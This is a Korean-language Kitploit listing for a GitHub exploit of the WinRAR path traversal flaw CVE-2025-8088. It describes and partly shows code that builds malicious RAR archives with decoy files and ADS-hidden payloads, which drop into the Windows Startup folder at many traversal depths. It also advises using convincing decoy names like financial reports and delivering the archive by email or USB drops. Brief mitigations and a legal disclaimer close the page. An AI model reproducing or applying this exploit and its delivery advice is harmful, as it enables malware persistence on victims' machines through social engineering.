Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-8088-Multi-Document — 다른 프로젝트와 달리 사용자 이름을 알 필요 없이 구형 WinRAR을 사용하는 시스템을 익스플로잇합니다. | Kitploit
도구/GitHubGitHub/pentestfunctions/cve-2025-8088-multi-document
Persistence MechanismsVulnerability AnalysisExploitationPenetration TestingLearning & EducationPayload DevelopmentBinary Exploitation
GitHubpentestfunctions/cve-2025-8088-multi-document

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-8088-Multi-Document

다른 프로젝트와 달리 사용자 이름을 알 필요 없이 구형 WinRAR을 사용하는 시스템을 익스플로잇합니다.

저장소 보기
3641년 전Kitploit 검토 완료

WinRAR 경로 탐색 익스플로잇 (CVE-2025-8088) - 다중 깊이 페이로드 배포

Payload

working

이 Python 스크립트는 WinRAR의 경로 탐색(path traversal) 취약점(CVE-2025-8088)을 악용하여 여러 상대 경로 깊이를 사용해 Windows 시작 폴더에 페이로드를 배포합니다. 이 익스플로잇은 악성 RAR 아카이브를 생성하며, 압축을 풀면 다양한 디렉터리 깊이로 피해자의 시작 폴더에 페이로드를 기록합니다.


주요 기능

  • 🎭 구성 가능한 콘텐츠로 여러 유인(데코이) 파일 생성
  • 📁 ADS(Alternate Data Streams)를 통해 페이로드 삽입
  • 📈 여러 트래버설 깊이 생성(기본 1~20)
  • 🔄 경로 탐색 취약점을 악용하도록 RAR 헤더 패치
  • 🎯 지속성을 위해 Windows 시작 폴더를 대상으로 지정
  • ⚙️ WinRAR 설치 위치 자동 탐색
  • 🔒 유효한 아카이브를 위해 CRC 체크섬 재계산

핵심 개념

1. 다중 깊이 트래버설 전략

이 스크립트는 각각 서로 다른 수의 상위 디렉터리를 트래버스하도록 구성된 여러 유인 파일(기본 20개)을 생성합니다:

root@kitploit:~
NUM_DEPTHS = 20  # Number of different traversal depths

각 파일은 서로 다른 경로 깊이를 사용합니다:

root@kitploit:~
File1.txt  → ..\Startup\payload.bat
File2.txt  → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 times) \Startup\payload.bat

✅ 피해자가 아카이브를 어디에 풀든(바탕 화면, 문서, 다운로드 또는 중첩 폴더) 최소한 하나의 페이로드가 시작 폴더에 도달하도록 보장합니다.


2. 유인 파일 사용자 지정

유인 파일은 기본적으로 일반 텍스트를 포함하지만 현실적인 사회공학(소셜 엔지니어링)을 위해 사용자 지정해야 합니다:

root@kitploit:~
# Create more convincing decoy content
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")

유인 콘텐츠를 변경해야 하는 이유는?

  • 아카이브가 정상적으로 보이게 함
  • 피해자가 압축을 풀 가능성을 높임
  • 현실적인 파일 이름/콘텐츠로 의심을 피함
  • 예상되는 문서 유형과 자연스럽게 어울림

3. 페이로드 구성

페이로드는 기본적으로 간단한 배치 스크립트이지만 어떤 실행 파일로도 대체할 수 있습니다:

root@kitploit:~
PAYLOAD = "@echo off\necho Payload executed!\npause\n"

페이로드 위치:

root@kitploit:~
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
  • 사용자 로그인 시 실행됨
  • 시스템의 모든 사용자에게 적용됨

4. 출력 파일

최종 악성 RAR 아카이브는 다음과 같이 저장됩니다:

root@kitploit:~
OUT_RAR = "exploit.rar"

Windows 빌드 요구 사항

이 익스플로잇 생성은 여러 이유로 Windows 환경이 필요합니다:

  • ADS(Alternate Data Streams) 의존성
    페이로드를 첨부하는 데 사용되는 NTFS 전용 기능:

    root@kitploit:~
    ads_path = f"{decoy}:{placeholder}"  # Windows-specific NTFS syntax
    
  • WinRAR 실행 파일 요구 사항
    WinRAR의 Windows CLI를 사용:

    root@kitploit:~
    subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
    
  • 경로 구조 호환성
    Windows 전용 경로를 대상으로 지정:

    root@kitploit:~
    RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
    
  • 페이로드 실행
    Windows 배치 파일을 생성:

    root@kitploit:~
    @echo off
    start /B notepad.exe
    

사용 방법

구성을 사용자 지정합니다:

root@kitploit:~
# Configuration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n"  # Your actual payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_"     # More convincing names

스크립트를 실행합니다:

root@kitploit:~
python CVE-2025-8088.py

출력물을 배포합니다:

  • 스크립트가 exploit.rar를 생성합니다
  • 이메일, USB 드롭 등을 통해 배포합니다

infect_premade_rarfiles.py

이 버전의 코드는 다음과 같이 실행할 수 있게 해줍니다: python3 infect_premade_rarfiles.py website_backup.rar

모든 파일을 추출한 다음, .txt, srt, sql 등 주입할 수 있는 파일(모든 파일 형식이 작동하는 것은 아님)을 주입하고 실행 준비가 완료된 rar 파일을 생성합니다.


방어 완화 조치

  • WinRAR을 최신 버전으로 업데이트
  • 신뢰할 수 없는 출처의 아카이브 추출 비활성화
  • 시작 폴더에 대한 쓰기 모니터링
  • 경로 탐색 시도를 탐지하는 보안 소프트웨어 사용

법적 및 윤리적 고지

⚠️ 이 도구는 교육 및 보안 연구 목적으로만 사용해야 합니다.
명시적 허가 없이 시스템을 대상으로 사용하지 마십시오. 무단 사용은 불법이며 비윤리적입니다.

도구 다운로드